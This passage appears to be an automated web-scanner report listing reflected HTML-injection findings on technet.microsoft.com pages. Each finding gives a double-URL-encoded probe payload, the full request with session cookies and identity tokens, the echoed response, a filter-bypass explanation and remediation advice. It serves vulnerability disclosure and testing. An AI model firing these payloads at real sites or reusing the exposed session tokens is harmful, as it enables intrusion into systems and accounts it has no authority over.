WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10200 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:56:58 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us46021"><a>ead3e3d9a48/library/bb625087" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b7ce%2522%253e%253ca%253e513411c4713 was submitted in the REST URL parameter 2. This input was echoed as 7b7ce"><a>513411c4713 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library7b7ce%2522%253e%253ca%253e513411c4713/bb625087.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10199 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:57:05 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library7b7ce"><a>513411c4713/bb625087" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da43a%2522%253e%253ca%253ef735b7a07d3 was submitted in the REST URL parameter 3. This input was echoed as da43a"><a>f735b7a07d3 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb625087.aspxda43a%2522%253e%253ca%253ef735b7a07d3 HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10209 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:57:13 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb625087.aspxda43a"><a>f735b7a07d3" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7577%2522%253e%253ca%253eacf3b7933c9 was submitted in the REST URL parameter 1. This input was echoed as d7577"><a>acf3b7933c9 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usd7577%2522%253e%253ca%253eacf3b7933c9/library/bb726976.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10199 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:57:58 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usd7577"><a>acf3b7933c9/library/bb726976" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 828a9%2522%253e%253ca%253eb8ea94052da was submitted in the REST URL parameter 2. This input was echoed as 828a9"><a>b8ea94052da in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library828a9%2522%253e%253ca%253eb8ea94052da/bb726976.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10199 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:58:06 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library828a9"><a>b8ea94052da/bb726976" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdec4%2522%253e%253ca%253e9c59d07c487 was submitted in the REST URL parameter 3. This input was echoed as fdec4"><a>9c59d07c487 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb726976.aspxfdec4%2522%253e%253ca%253e9c59d07c487 HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10209 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:58:13 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb726976.aspxfdec4"><a>9c59d07c487" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7b79%2522%253e%253ca%253e6e48a9d51bc was submitted in the REST URL parameter 1. This input was echoed as d7b79"><a>6e48a9d51bc in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
